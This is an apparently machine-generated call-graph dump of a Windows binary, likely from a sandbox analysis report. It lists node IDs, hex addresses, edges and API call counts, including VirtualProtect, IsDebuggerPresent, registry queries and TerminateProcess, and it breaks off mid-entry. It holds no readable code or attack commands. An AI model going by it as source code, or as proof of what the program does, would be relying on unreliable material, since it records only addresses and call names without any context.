88468 900ae0 Mailbox ___crtGetEnvironmentStringsW 88431->88468 88435 900509 88526 93cc5c 87 API calls 4 library calls 88435->88526 88436 90146e 88446 8f6eed 48 API calls 88436->88446 88439 90f4ea 48 API calls 88457 8ffec8 88439->88457 88440 8f6eed 48 API calls 88440->88457 88443 96a246 88447 8f6eed 48 API calls 88443->88447 88444 96a922 88445 901473 88525 93cc5c 87 API calls 4 library calls 88445->88525 88461 8fffe1 Mailbox 88446->88461 88447->88461 88450 8fd7f7 48 API calls 88450->88457 88451 96a873 88452 96a30e 88452->88461 88521 9297ed InterlockedDecrement 88452->88521 88453 910f0a 52 API calls __cinit 88453->88457 88454 8fce19 48 API calls 88454->88468 88455 9297ed InterlockedDecrement 88455->88457 88457->88435 88457->88436 88457->88439 88457->88440 88457->88443 88457->88445 88457->88450 88457->88452 88457->88453 88457->88455 88458 96a973 88457->88458 88457->88461 88462 9015b5 88457->88462 88518 901820 332 API calls 2 library calls 88457->88518 88519 901d10 59 API calls Mailbox 88457->88519 88527 93cc5c 87 API calls 4 library calls 88458->88527 88460 96a982 88524 93cc5c 87 API calls 4 library calls 88462->88524 88463 94e822 332 API calls 88463->88468 88464 90f4ea 48 API calls 88464->88468 88465 8ffe30 332 API calls 88465->88468 88466 96a706 88522 93cc5c 87 API calls 4 library calls 88466->88522 88468->88454 88468->88457 88468->88461 88468->88463 88468->88464 88468->88465 88468->88466 88469 901526 Mailbox 88468->88469 88470 9297ed InterlockedDecrement 88468->88470 88471 946ff0 332 API calls 88468->88471 88474 950d1d 88468->88474 88477 950d09 88468->88477 88480 94f0ac 88468->88480 88512 93a6ef 88468->88512 88520 94ef61 83 API calls 2 library calls 88468->88520 88523 93cc5c 87 API calls 4 library calls 88469->88523 88470->88468 88471->88468 88528 94f8ae 88474->88528 88476 950d2d 88476->88468 88478 94f8ae 130 API calls 88477->88478 88479 950d19 88478->88479 88479->88468 88481 8fd7f7 48 API calls 88480->88481 88482 94f0c0 88481->88482 88483 8fd7f7 48 API calls 88482->88483 88484 94f0c8 88483->88484 88485 8fd7f7 48 API calls 88484->88485 88486 94f0d0 88485->88486 88487 8f936c 82 API calls 88486->88487 88489 94f0de 88487->88489 88488 94f2f9 Mailbox 88488->88468 88489->88488 88490 8f6a63 48 API calls 88489->88490 88491 8fc799 48 API calls 88489->88491 88492 94f2cc 88489->88492 88493 94f2b3 88489->88493 88496 94f2ce 88489->88496 88499 8f6eed 48 API calls 88489->88499 88502 8fbdfa 48 API calls 88489->88502 88504 8fbdfa 48 API calls 88489->88504 88509 8f936c 82 API calls 88489->88509 88510 8f518c 48 API calls 88489->88510 88511 8f510d 48 API calls 88489->88511 88490->88489 88491->88489 88492->88488 88666 8f6b68 48 API calls 88492->88666 88647 8f518c 88493->88647 88498 8f518c 48 API calls 88496->88498 88501 94f2dd 88498->88501 88499->88489 88503 8f510d 48 API calls 88501->88503 88505 94f175 CharUpperBuffW 88502->88505 88503->88492 88507 94f23a CharUpperBuffW 88504->88507 88506 8fd645 53 API calls 88505->88506 88506->88489 88646 90d922 55 API calls 2 library calls 88507->88646 88509->88489 88510->88489 88511->88489 88513 93a6fb 88512->88513 88514 90f4ea 48 API calls 88513->88514 88515 93a709 88514->88515 88516 8fd7f7 48 API calls 88515->88516 88517 93a717 88515->88517 88516->88517 88517->88468 88518->88457 88519->88457 88520->88468 88521->88461 88522->88469 88523->88461 88524->88461 88525->88451 88526->88444 88527->88460 88529 8f936c 82 API calls 88528->88529 88530 94f8ea 88529->88530 88552 94f92c Mailbox 88530->88552 88564 950567 88530->88564 88532 94fb8b 88533 94fcfa 88532->88533 88537 94fb95 88532->88537 88623 950688 90 API calls Mailbox 88533->88623 88536 94fd07 88536->88537 88538 94fd13 88536->88538 88577 94f70a 88537->88577 88538->88552 88539 8f936c 82 API calls 88558 94f984 Mailbox 88539->88558 88544 94fbc9 88591 90ed18 88544->88591 88547 94fbe3 88621 93cc5c 87 API calls 4 library calls 88547->88621 88548 94fbfd 88595 90c050 88548->88595 88551 94fbee GetCurrentProcess TerminateProcess 88551->88548 88552->88476 88553 94fc14 88554 901b90 48 API calls 88553->88554 88563 94fc3e 88553->88563 88556 94fc2d 88554->88556 88555 94fd65 88555->88552 88560 94fd7e FreeLibrary 88555->88560 88559 95040f 106 API calls 88556->88559 88557 901b90 48 API calls 88557->88563 88558->88532 88558->88539 88558->88552 88558->88558 88619 9529e8 48 API calls ___crtGetEnvironmentStringsW 88558->88619 88620 94fda5 60 API calls 2 library calls 88558->88620 88559->88563 88560->88552 88563->88555 88563->88557 88606 95040f 88563->88606 88622 8fdcae 50 API calls Mailbox 88563->88622 88565 8fbdfa 48 API calls 88564->88565 88566 950582 CharLowerBuffW 88565->88566 88624 931f11 88566->88624 88570 8fd7f7 48 API calls 88571 9505bb 88570->88571 88631 8f69e9 48 API calls ___crtGetEnvironmentStringsW 88571->88631 88573 9505d2 88632 8fb18b 88573->88632 88574 95061a Mailbox 88574->88558 88576 9505de Mailbox 88576->88574 88636 94fda5 60 API calls 2 library calls 88576->88636 88578 94f725 88577->88578 88582 94f77a 88577->88582 88579 90f4ea 48 API calls 88578->88579 88581 94f747 88579->88581 88580 90f4ea 48 API calls 88580->88581 88581->88580 88581->88582 88583 950828 88582->88583 88584 950a53 Mailbox 88583->88584 88587 95084b _strcat _wcscpy __NMSG_WRITE 88583->88587 88584->88544 88585 8fd286 48 API calls 88585->88587 88586 8fcf93 58 API calls 88586->88587 88587->88584 88587->88585 88587->88586 88588 8f936c 82 API calls 88587->88588 88589 91395c 47 API calls std::exception::_Copy_str 88587->88589 88639 938035 50 API calls __NMSG_WRITE 88587->88639 88588->88587 88589->88587 88593 90ed2d 88591->88593 88592 90edc5 VirtualProtect 88594 90ed93 88592->88594 88593->88592 88593->88594 88594->88547 88594->88548 88596 90c064 88595->88596 88598 90c069 Mailbox 88595->88598 88640 90c1af 48 API calls 88596->88640 88604 90c077 88598->88604 88641 90c15c 48 API calls 88598->88641 88600 90f4ea 48 API calls 88602 90c108 88600->88602 88601 90c152 88601->88553 88603 90f4ea 48 API calls 88602->88603 88605 90c113 88603->88605 88604->88600 88604->88601 88605->88553 88605->88605 88607 950427 88606->88607 88616 950443 88606->88616 88608 95044f 88607->88608 88609 95042e 88607->88609 88610 9504f8 88607->88610 88607->88616 88644 8fcdb9 48 API calls 88608->88644 88642 937c56 50 API calls _strlen 88609->88642 88645 939dc5 104 API calls 88610->88645 88611 95051e 88611->88563 88614 911c9d _free 47 API calls 88614->88611 88616->88611 88616->88614 88617 950438 88643 8fcdb9 48 API calls 88617->88643 88619->88558 88620->88558 88621->88551 88622->88563 88623->88536 88625 931f3b __NMSG_WRITE 88624->88625 88626 931f79 88625->88626 88627 931f6f 88625->88627 88629 931ffa 88625->88629 88626->88570 88626->88576 88627->88626 88637 90d37a 60 API calls 88627->88637 88629->88626 88638 90d37a 60 API calls 88629->88638 88631->88573 88633 8fb1a2 ___crtGetEnvironmentStringsW 88632->88633 88634 8fb199 88632->88634 88633->88576 88634->88633 88635 8fbdfa 48 API calls 88634->88635 88635->88633 88636->88574 88637->88627 88638->88629 88639->88587 88640->88598 88641->88604 88642->88617 88643->88616 88644->88616 88645->88616 88646->88489 88648 8f5197 88647->88648 88649 8f519f 88648->88649 88650 961ace 88648->88650 88667 8f5130 88649->88667 88652 8f6b4a 48 API calls 88650->88652 88654 961adb __NMSG_WRITE 88652->88654 88653 8f51aa 88657 8f510d 88653->88657 88655 90ee75 48 API calls 88654->88655 88656 961b07 ___crtGetEnvironmentStringsW 88655->88656 88658 8f511f 88657->88658 88659 961be7 88657->88659 88677 8fb384 88658->88677 88686 92a58f 48 API calls ___crtGetEnvironmentStringsW 88659->88686 88662 8f512b 88662->88492 88663 961bf1 88664 8f6eed 48 API calls 88663->88664 88665 961bf9 Mailbox 88664->88665 88666->88488 88668 8f513f __NMSG_WRITE 88667->88668 88669 961b27 88668->88669 88670 8f5151 88668->88670 88671 8f6b4a 48 API calls 88669->88671 88672 8fbb85 48 API calls 88670->88672 88673 961b34 88671->88673 88674 8f515e ___crtGetEnvironmentStringsW 88672->88674 88675 90ee75 48 API calls 88673->88675 88674->88653 88676 961b57 ___crtGetEnvironmentStringsW 88675->88676 88678 8fb392 88677->88678 88679 8fb3c5 ___crtGetEnvironmentStringsW 88677->88679 88678->88679 88680 8fb3fd 88678->88680 88681 8fb3b8 88678->88681 88679->88662 88679->88679 88682 90f4ea 48 API calls 88680->88682 88683 8fbb85 48 API calls 88681->88683 88684 8fb407 88682->88684 88683->88679 88685 90f4ea 48 API calls 88684->88685 88685->88679 88686->88663 88687 9619dd 88692 8f4a30 88687->88692 88689 9619f1 88712 910f0a 52 API calls __cinit 88689->88712 88691 9619fb 88693 8f4a40 __ftell_nolock 88692->88693 88694 8fd7f7 48 API calls 88693->88694 88695 8f4af6 88694->88695 88713 8f5374 88695->88713 88697 8f4aff 88720 8f363c 88697->88720 88700 8f518c 48 API calls 88701 8f4b18 88700->88701 88726 8f64cf 88701->88726 88704 8fd7f7 48 API calls 88705 8f4b32 88704->88705 88732 8f49fb 88705->88732 88707 8f4b43 Mailbox 88707->88689 88708 8fce19 48 API calls 88710 8f4b3d _wcscat Mailbox __NMSG_WRITE 88708->88710 88709 8f64cf 48 API calls 88709->88710 88710->88707 88710->88708 88710->88709 88711 8f61a6 48 API calls 88710->88711 88711->88710 88712->88691 88746 91f8a0 88713->88746 88716 8fce19 48 API calls 88717 8f53a7 88716->88717 88748 8f660f 88717->88748 88719 8f53b1 Mailbox 88719->88697 88721 8f3649 __ftell_nolock 88720->88721 88771 8f366c GetFullPathNameW 88721->88771 88723 8f365a 88724 8f6a63 48 API calls 88723->88724 88725 8f3669 88724->88725 88725->88700 88727 8f651b 88726->88727 88731 8f64dd ___crtGetEnvironmentStringsW 88726->88731 88730 90f4ea 48 API calls 88727->88730 88728 90f4ea 48 API calls 88729 8f4b29 88728->88729 88729->88704 88730->88731 88731->88728 88773 8fbcce 88732->88773 88735 8f4a2b 88735->88710 88736 9641cc RegQueryValueExW 88737 964246 RegCloseKey 88736->88737 88738 9641e5 88736->88738 88739 90f4ea 48 API calls 88738->88739 88740 9641fe 88739->88740 88741 8f47b7 48 API calls 88740->88741 88742 964208 RegQueryValueExW 88741->88742 88743 964224 88742->88743 88744 96423b 88742->88744 88745 8f6a63 48 API calls 88743->88745 88744->88737 88745->88744 88747 8f5381 GetModuleFileNameW 88746->88747 88747->88716 88749 91f8a0 __ftell_nolock 88748->88749 88750 8f661c GetFullPathNameW 88749->88750 88755 8f6a63 88750->88755 88752 8f6643 88766 8f6571 88752->88766 88756 8f6adf 88755->88756 88759 8f6a6f __NMSG_WRITE 88755->88759 88757 8fb18b 48 API calls 88756->88757 88758 8f6ab6 ___crtGetEnvironmentStringsW 88757->88758 88758->88752 88760 8f6a8b 88759->88760 88761 8f6ad7 88759->88761 88762 8f6b4a 48 API calls 88760->88762 88770 8fc369 48 API calls 88761->88770 88764 8f6a95 88762->88764 88765 90ee75 48 API calls 88764->88765 88765->88758 88767 8f657f 88766->88767 88768 8fb18b 48 API calls 88767->88768 88769 8f658f 88768->88769 88769->88719 88770->88758 88772 8f368a 88771->88772 88772->88723 88774 8fbce8 88773->88774 88778 8f4a0a RegOpenKeyExW 88773->88778 88775 90f4ea 48 API calls 88774->88775 88776 8fbcf2 88775->88776 88777 90ee75 48 API calls 88776->88777 88777->88778 88778->88735 88778->88736 88779 9619ba 88784 90c75a 88779->88784 88783 9619c9 88785 8fd7f7 48 API calls 88784->88785 88786 90c7c8 88785->88786 88792 90d26c 88786->88792 88789 90c865 88790 90c881 88789->88790 88795 90d1fa 48 API calls ___crtGetEnvironmentStringsW 88789->88795 88791 910f0a 52 API calls __cinit 88790->88791 88791->88783 88796 90d298 88792->88796 88795->88789 88797 90d28b 88796->88797 88798 90d2a5 88796->88798 88797->88789 88798->88797 88799 90d2ac RegOpenKeyExW 88798->88799 88799->88797 88800 90d2c6 RegQueryValueExW 88799->88800 88801 90d2e7 88800->88801 88802 90d2fc RegCloseKey 88800->88802 88801->88802 88802->88797 88803 915dfd 88804 915e09 _wprintf 88803->88804 88840 917eeb GetStartupInfoW 88804->88840 88806 915e0e 88842 919ca7 GetProcessHeap 88806->88842 88808 915e66 88809 915e71 88808->88809 88927 915f4d 47 API calls 3 library calls 88808->88927 88843 917b47 88809->88843 88812 915e77 88813 915e82 __RTC_Initialize 88812->88813 88928 915f4d 47 API calls 3 library calls 88812->88928 88864 91acb3 88813->88864 88816 915e91 88817 915e9d GetCommandLineW 88816->88817 88929 915f4d 47 API calls 3 library calls 88816->88929 88883 922e7d GetEnvironmentStringsW 88817->88883 88820 915e9c 88820->88817 88824 915ec2 88896 922cb4 88824->88896 88827 915ec8 88828 915ed3 88827->88828 88931 91115b 47 API calls 3 library calls 88827->88931 88910 911195 88828->88910 88831 915edb 88832 915ee6 __wwincmdln 88831->88832 88932 91115b 47 API calls 3 library calls 88831->88932 88914 8f3a0f 88832->88914 88835 915efa 88836 915f09 88835->88836 88933 9113f1 47 API calls _doexit 88835->88933 88934 911186 47 API calls _doexit 88836->88934 88839 915f0e _wprintf 88841 917f01 88840->88841 88841->88806 88842->88808 88935 91123a 30 API calls 2 library calls 88843->88935 88845 917b4c 88936 917e23 InitializeCriticalSectionAndSpinCount 88845->88936 88847 917b55 88937 917bbd 50 API calls 2 library calls 88847->88937 88848 917b51 88848->88847 88938 917e6d TlsAlloc 88848->88938 88851 917b67 88851->88847 88853 917b72 88851->88853 88852 917b5a 88852->88812 88939 916986 88853->88939 88856 917bb4 88947 917bbd 50 API calls 2 library calls 88856->88947 88859 917b93 88859->88856 88861 917b99 88859->88861 88860 917bb9 88860->88812 88946 917a94 47 API calls 4 library calls 88861->88946 88863 917ba1 GetCurrentThreadId 88863->88812 88865 91acbf _wprintf 88864->88865 88866 917cf4 __lock 47 API calls 88865->88866 88867 91acc6 88866->88867 88868 916986 __calloc_crt 47 API calls 88867->88868 88870 91acd7 88868->88870 88869 91ace2 _wprintf @_EH4_CallFilterFunc@8 88869->88816 88870->88869 88871 91ad42 GetStartupInfoW 88870->88871 88877 91ad57 88871->88877 88879 91ae80 88871->88879 88872 91af44 88956 91af58 LeaveCriticalSection _doexit 88872->88956 88874 91aec9 GetStdHandle 88874->88879 88875 916986 __calloc_crt 47 API calls 88875->88877 88876 91aedb GetFileType 88876->88879 88877->88875 88878 91ada5 88877->88878 88877->88879 88878->88879 88881 91ade5 InitializeCriticalSectionAndSpinCount 88878->88881 88882 91add7 GetFileType 88878->88882 88879->88872 88879->88874 88879->88876 88880 91af08 InitializeCriticalSectionAndSpinCount 88879->88880 88880->88879 88881->88878 88882->88878 88882->88881 88884 915ead 88883->88884 88885 922e8e 88883->88885 88890 922a7b GetModuleFileNameW 88884->88890 88957 9169d0 47 API calls std::exception::_Copy_str 88885->88957 88888 922eca FreeEnvironmentStringsW 88888->88884 88889 922eb4 ___crtGetEnvironmentStringsW 88889->88888 88891 922aaf _wparse_cmdline 88890->88891 88892 915eb7 88891->88892 88893 922ae9 88891->88893 88892->88824 88930 91115b 47 API calls 3 library calls 88892->88930 88958 9169d0 47 API calls std::exception::_Copy_str 88893->88958 88895 922aef _wparse_cmdline 88895->88892 88897 922ccd __NMSG_WRITE 88896->88897 88901 922cc5 88896->88901 88898 916986 __calloc_crt 47 API calls 88897->88898 88906 922cf6 __NMSG_WRITE 88898->88906 88899 922d4d 88900 911c9d _free 47 API calls 88899->88900 88900->88901 88901->88827 88902 916986 __calloc_crt 47 API calls 88902->88906 88903 922d72 88905 911c9d _free 47 API calls 88903->88905 88905->88901 88906->88899 88906->88901 88906->88902 88906->88903 88907 922d89 88906->88907 88959 922567 47 API calls _W_expandtime 88906->88959 88960 916e20 IsProcessorFeaturePresent 88907->88960 88909 922d95 88909->88827 88911 9111a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 88910->88911 88913 9111e0 __IsNonwritableInCurrentImage 88911->88913 88975 910f0a 52 API calls __cinit 88911->88975 88913->88831 88915 8f3a29 88914->88915 88916 961ebf 88914->88916 88917 8f3a63 IsThemeActive 88915->88917 88976 911405 88917->88976 88921 8f3a8f 88988 8f3adb SystemParametersInfoW SystemParametersInfoW 88921->88988 88923 8f3a9b 88989 8f3d19 88923->88989 88925 8f3aa3 SystemParametersInfoW 88926 8f3ac8 88925->88926 88926->88835 88927->88809 88928->88813 88929->88820 88933->88836 88934->88839 88935->88845 88936->88848 88937->88852 88938->88851 88941 91698d 88939->88941 88942 9169ca 88941->88942 88943 9169ab Sleep 88941->88943 88948 9230aa 88941->88948 88942->88856 88945 917ec9 TlsSetValue 88942->88945 88944 9169c2 88943->88944 88944->88941 88944->88942 88945->88859 88946->88863 88947->88860 88949 9230d0 __calloc_impl 88948->88949 88950 9230b5 88948->88950 88953 9230e0 RtlAllocateHeap 88949->88953 88954 9230c6 88949->88954 88950->88949 88951 9230c1 88950->88951 88955 917c0e 47 API calls __getptd_noexit 88951->88955 88953->88949 88953->88954 88954->88941 88955->88954 88956->88869 88957->88889 88958->88895 88959->88906 88961 916e2b 88960->88961 88966 916cb5 88961->88966 88965 916e46 88965->88909 88967 916ccf _memset ___raise_securityfailure 88966->88967 88968 916cef IsDebuggerPresent 88967->88968 88974 9181ac SetUnhandledExceptionFilter UnhandledExceptionFilter 88968->88974 88970 91a70c __87except 6 API calls 88971 916dd6 88970->88971 88973 918197 GetCurrentProcess TerminateProcess 88971->88973 88972 916db3 ___raise_securityfailure 88972->88970 88973->88965 88974->88972 88975->88913 88977 917cf4 __lock 47 API calls 88976->88977 88978 911410 88977->88978 89041 917e58 LeaveCriticalSection 88978->89041 88980 8f3a88 88981 91146d 88980->88981 88982 911491 88981->88982 88983 911477 88981->88983 88982->88921 88983->88982 89042 917c0e 47 API calls __getptd_noexit 88983->89042 88985 911481 89043 916e10 8 API calls _W_expandtime 88985->89043 88987 91148c 88987->88921 88988->88923 88990 8f3d26 __ftell_nolock 88989->88990 88991 8fd7f7 48 API calls 88990->88991 88992 8f3d31 GetCurrentDirectoryW 88991->88992 89044 8f61ca 88992->89044 88994 8f3d57 IsDebuggerPresent 88995 961cc1 MessageBoxA 88994->88995 88996 8f3d65 88994->88996 88997 961cd9 88995->88997 88996->88997 88998 8f3d82 88996->88998 89028 8f3e3a 88996->89028 89169 90c682 48 API calls 88997->89169 89118 8f40e5 88998->89118 88999 8f3e41 SetCurrentDirectoryW 89002 8f3e4e Mailbox 88999->89002 89002->88925 89003 961ce9 89008 961cff SetCurrentDirectoryW 89003->89008 89008->89002 89028->88999 89041->88980 89042->88985 89043->88987 89171 90e99b 89044->89171 89048 8f61eb 89049 8f5374 50 API calls 89048->89049 89050 8f61ff 89049->89050 89051 8fce19 48 API calls 89050->89051 89052 8f620c 89051->89052 89188 8f39db 89052->89188 89054 8f6216 Mailbox 89055 8f6eed 48 API calls 89054->89055 89056 8f622b 89055->89056 89200 8f9048 89056->89200 89059 8fce19 48 API calls 89060 8f6244 89059->89060 89061 8fd6e9 55 API calls 89060->89061 89062 8f6254 Mailbox 89061->89062 89063 8fce19 48 API calls 89062->89063 89064 8f627c 89063->89064 89065 8fd6e9 55 API calls 89064->89065 89066 8f628f Mailbox 89065->89066 89067 8fce19 48 API calls 89066->89067 89068 8f62a0 89067->89068 89069 8fd645 53 API calls 89068->89069 89070 8f62b2 Mailbox 89069->89070 89071 8fd7f7 48 API calls 89070->89071 89072 8f62c5 89071->89072 89203 8f63fc 89072->89203 89076 8f62df 89077 8f62e9 89076->89077 89078 961c08 89076->89078 89079 910fa7 _W_store_winword 59 API calls 89077->89079 89080 8f63fc 48 API calls 89078->89080 89081 8f62f4 89079->89081 89082 961c1c 89080->89082 89081->89082 89083 8f62fe 89081->89083 89085 8f63fc 48 API calls 89082->89085 89084 910fa7 _W_store_winword 59 API calls 89083->89084 89086 8f6309 89084->89086 89087 961c38 89085->89087 89086->89087 89088 8f6313 89086->89088 89089 8f5374 50 API calls 89087->89089 89090 910fa7 _W_store_winword 59 API calls 89088->89090 89091 961c5d 89089->89091 89092 8f631e 89090->89092 89093 8f63fc 48 API calls 89091->89093 89094 8f635f 89092->89094 89096 961c86 89092->89096 89099 8f63fc 48 API calls 89092->89099 89097 961c69 89093->89097 89095 8f636c 89094->89095 89094->89096 89101 90c050 48 API calls 89095->89101 89100 8f6eed 48 API calls 89096->89100 89098 8f6eed 48 API calls 89097->89098 89102 961c77 89098->89102 89103 8f6342 89099->89103 89104 961ca8 89100->89104 89105 8f6384 89101->89105 89106 8f63fc 48 API calls 89102->89106 89107 8f6eed 48 API calls 89103->89107 89108 8f63fc 48 API calls 89104->89108 89110 901b90 48 API calls 89105->89110 89106->89096 89111 8f6350 89107->89111 89109 961cb5 89108->89109 89109->89109 89115 8f6394 89110->89115 89112 8f63fc 48 API calls 89111->89112 89112->89094 89113 901b90 48 API calls 89113->89115 89115->89113 89116 8f63fc 48 API calls 89115->89116 89117 8f63d6 Mailbox 89115->89117 89219 8f6b68 48 API calls 89115->89219 89116->89115 89117->88994 89119 8f40f2 __ftell_nolock 89118->89119 89120 8f410b 89119->89120 89121 96370e _memset 89119->89121 89122 8f660f 49 API calls 89120->89122 89124 96372a GetOpenFileNameW 89121->89124 89123 8f4114 89122->89123 89261 8f40a7 89123->89261 89126 963779 89124->89126 89128 8f6a63 48 API calls 89126->89128 89129 96378e 89128->89129 89129->89129 89131 8f4129 89279 8f4139 89131->89279 89169->89003 89172 8fd7f7 48 API calls 89171->89172 89173 8f61db 89172->89173 89174 8f6009 89173->89174 89175 8f6016 __ftell_nolock 89174->89175 89176 8f6a63 48 API calls 89175->89176 89181 8f617c Mailbox 89175->89181 89178 8f6048 89176->89178 89186 8f607e Mailbox 89178->89186 89220 8f61a6 89178->89220 89179 8f61a6 48 API calls 89179->89186 89180 8f614f 89180->89181 89182 8fce19 48 API calls 89180->89182 89181->89048 89184 8f6170 89182->89184 89183 8fce19 48 API calls 89183->89186 89185 8f64cf 48 API calls 89184->89185 89185->89181 89186->89179 89186->89180 89186->89181 89186->89183 89187 8f64cf 48 API calls 89186->89187 89187->89186 89189 8f41a9 136 API calls 89188->89189 89190 8f39fe 89189->89190 89191 8f3a06 89190->89191 89223 93c396 89190->89223 89191->89054 89194 962ff0 89196 911c9d _free 47 API calls 89194->89196 89195 8f4252 84 API calls 89195->89194 89197 962ffd 89196->89197 89198 8f4252 84 API calls 89197->89198 89199 963006 89198->89199 89199->89199 89201 90f4ea 48 API calls 89200->89201 89202 8f6237 89201->89202 89202->89059 89204 8f641f 89203->89204 89205 8f6406 89203->89205 89207 8f6a63 48 API calls 89204->89207 89206 8f6eed 48 API calls 89205->89206 89208 8f62d1 89206->89208 89207->89208 89209 910fa7 89208->89209 89210 910fb3 89209->89210 89211 911028 89209->89211 89218 910fd8 89210->89218 89258 917c0e 47 API calls __getptd_noexit 89210->89258 89260 91103a 59 API calls 3 library calls 89211->89260 89214 911035 89214->89076 89215 910fbf 89259 916e10 8 API calls _W_expandtime 89215->89259 89217 910fca 89217->89076 89218->89076 89219->89115 89221 8fbdfa 48 API calls 89220->89221 89222 8f61b1 89221->89222 89222->89178 89224 8f4517 83 API calls 89223->89224 89225 93c405 89224->89225 89226 93c56d 94 API calls 89225->89226 89227 93c417 89226->89227 89228 8f44ed 64 API calls 89227->89228 89256 93c41b 89227->89256 89229 93c432 89228->89229 89230 8f44ed 64 API calls 89229->89230 89231 93c442 89230->89231 89232 8f44ed 64 API calls 89231->89232 89233 93c45d 89232->89233 89234 8f44ed 64 API calls 89233->89234 89235 93c478 89234->89235 89236 8f4517 83 API calls 89235->89236 89237 93c48f 89236->89237 89238 91395c std::exception::_Copy_str 47 API calls 89237->89238 89239 93c496 89238->89239 89240 91395c std::exception::_Copy_str 47 API calls 89239->89240 89241 93c4a0 89240->89241 89242 8f44ed 64 API calls 89241->89242 89243 93c4b4 89242->89243 89244 93bf5a GetSystemTimeAsFileTime 89243->89244 89245 93c4c7 89244->89245 89246 93c4f1 89245->89246 89247 93c4dc 89245->89247 89248 93c4f7 89246->89248 89249 93c556 89246->89249 89250 911c9d _free 47 API calls 89247->89250 89251 93b965 118 API calls 89248->89251 89252 911c9d _free 47 API calls 89249->89252 89253 93c4e2 89250->89253 89255 93c54e 89251->89255 89252->89256 89254 911c9d _free 47 API calls 89253->89254 89254->89256 89257 911c9d _free 47 API calls 89255->89257 89256->89194 89256->89195 89257->89256 89258->89215 89259->89217 89260->89214 89262 91f8a0 __ftell_nolock 89261->89262 89263 8f40b4 GetLongPathNameW 89262->89263 89264 8f6a63 48 API calls 89263->89264 89265 8f40dc 89264->89265 89266 8f49a0 89265->89266 89267 8fd7f7 48 API calls 89266->89267 89268 8f49b2 89267->89268 89269 8f660f 49 API calls 89268->89269 89270 8f49bd 89269->89270 89271 962e35 89270->89271 89272 8f49c8 89270->89272 89276 962e4f 89271->89276 89319 90d35e 60 API calls 89271->89319 89274 8f64cf 48 API calls 89272->89274 89275 8f49d4 89274->89275 89313 8f28a6 89275->89313 89278 8f49e7 Mailbox 89278->89131 89280 8f41a9 136 API calls 89279->89280 89281 8f415e 89280->89281 89282 963489 89281->89282 89283 8f41a9 136 API calls 89281->89283 89284 93c396 122 API calls 89282->89284 89285 8f4172 89283->89285 89286 96349e 89284->89286 89285->89282 89287 8f417a 89285->89287 89288 9634a2 89286->89288 89289 9634bf 89286->89289 89291 8f4186 89287->89291 89292 9634aa 89287->89292 89293 8f4252 84 API calls 89288->89293 89290 90f4ea 48 API calls 89289->89290 89296 963504 Mailbox 89290->89296 89320 8fc833 89291->89320 89413 936b49 88 API calls _wprintf 89292->89413 89293->89292 89299 9636b4 89296->89299 89303 8fba85 48 API calls 89296->89303 89307 9636c5 89296->89307 89310 8fce19 48 API calls 89296->89310 89407 8f4dd9 89296->89407 89414 932551 48 API calls ___crtGetEnvironmentStringsW 89296->89414 89415 932472 60 API calls 2 library calls 89296->89415 89416 939c12 48 API calls 89296->89416 89298 9634b8 89298->89289 89300 911c9d _free 47 API calls 89299->89300 89301 9636bc 89300->89301 89302 8f4252 84 API calls 89301->89302 89302->89307 89303->89296 89306 911c9d _free 47 API calls 89306->89307 89307->89306 89308 8f4252 84 API calls 89307->89308 89417 9325b5 87 API calls 4 library calls 89307->89417 89308->89307 89310->89296 89314 8f28d7 ___crtGetEnvironmentStringsW 89313->89314 89315 8f28b8 89313->89315 89316 90f4ea 48 API calls 89314->89316 89317 90f4ea 48 API calls 89315->89317 89318 8f28ee 89316->89318 89317->89314 89318->89278 89319->89271 89321 8fc843 __ftell_nolock 89320->89321 89322 963095 89321->89322 89323 8fc860 89321->89323 89439 9325b5 87 API calls 4 library calls 89322->89439 89423 8f48ba 49 API calls 89323->89423 89326 9630a8 89440 9325b5 87 API calls 4 library calls 89326->89440 89327 8fc882 89424 8f4550 56 API calls 89327->89424 89329 8fc897 89329->89326 89331 8fc89f 89329->89331 89333 8fd7f7 48 API calls 89331->89333 89332 9630c4 89336 8fc90c 89332->89336 89334 8fc8ab 89333->89334 89425 90e968 49 API calls __ftell_nolock 89334->89425 89338 9630d7 89336->89338 89339 8fc91a 89336->89339 89337 8fc8b7 89340 8fd7f7 48 API calls 89337->89340 89342 8f4907 CloseHandle 89338->89342 89341 911dfc __wsplitpath 47 API calls 89339->89341 89343 8fc8c3 89340->89343 89351 8fc943 _wcscat _wcscpy 89341->89351 89344 9630e3 89342->89344 89345 8f41a9 136 API calls 89344->89345 89347 96310d 89345->89347 89349 963136 89347->89349 89353 93c396 122 API calls 89347->89353 89352 8fc96d SetCurrentDirectoryW 89351->89352 89356 90f4ea 48 API calls 89352->89356 89359 8fc988 89356->89359 89408 8f4dec 89407->89408 89411 8f4e9a 89407->89411 89409 90f4ea 48 API calls 89408->89409 89410 8f4e1e 89408->89410 89409->89410 89410->89411 89412 90f4ea 48 API calls 89410->89412 89411->89296 89412->89410 89413->89298 89414->89296 89415->89296 89416->89296 89417->89307 89423->89327 89424->89329 89425->89337 89439->89326 89440->89332 89497 9619cb 89502 8f2322 89497->89502 89499 9619d1 89535 910f0a 52 API calls __cinit 89499->89535 89501 9619db 89503 8f2344 89502->89503 89536 8f26df 89503->89536 89508 8fd7f7 48 API calls 89509 8f2384 89508->89509 89510 8fd7f7 48 API calls 89509->89510 89511 8f238e 89510->89511 89512 8fd7f7 48 API calls 89511->89512 89513 8f2398 89512->89513 89514 8fd7f7 48 API calls 89513->89514 89515 8f23de 89514->89515 89516 8fd7f7 48 API calls 89515->89516 89517 8f24c1 89516->89517 89544 8f263f 89517->89544 89521 8f24f1 89522 8fd7f7 48 API calls 89521->89522 89523 8f24fb 89522->89523 89573 8f2745 89523->89573 89525 8f2546 89526 8f2556 GetStdHandle 89525->89526 89527 96501d 89526->89527 89528 8f25b1 89526->89528 89527->89528 89530 965026 89527->89530 89529 8f25b7 CoInitialize 89528->89529 89529->89499 89580 9392d4 53 API calls 89530->89580 89532 96502d 89581 9399f9 CreateThread 89532->89581 89534 965039 CloseHandle 89534->89529 89535->89501 89582 8f2854 89536->89582 89539 8f6a63 48 API calls 89540 8f234a 89539->89540 89541 8f272e 89540->89541 89596 8f27ec 6 API calls 89541->89596 89543 8f237a 89543->89508 89545 8fd7f7 48 API calls 89544->89545 89546 8f264f 89545->89546 89547 8fd7f7 48 API calls 89546->89547 89548 8f2657 89547->89548 89597 8f26a7 89548->89597 89551 8f26a7 48 API calls 89552 8f2667 89551->89552 89553 8fd7f7 48 API calls 89552->89553 89554 8f2672 89553->89554 89555 90f4ea 48 API calls 89554->89555 89556 8f24cb 89555->89556 89557 8f22a4 89556->89557 89558 8f22b2 89557->89558 89559 8fd7f7 